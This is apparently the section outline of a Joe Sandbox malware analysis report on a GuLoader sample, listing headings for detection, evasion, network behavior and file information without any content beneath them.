Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets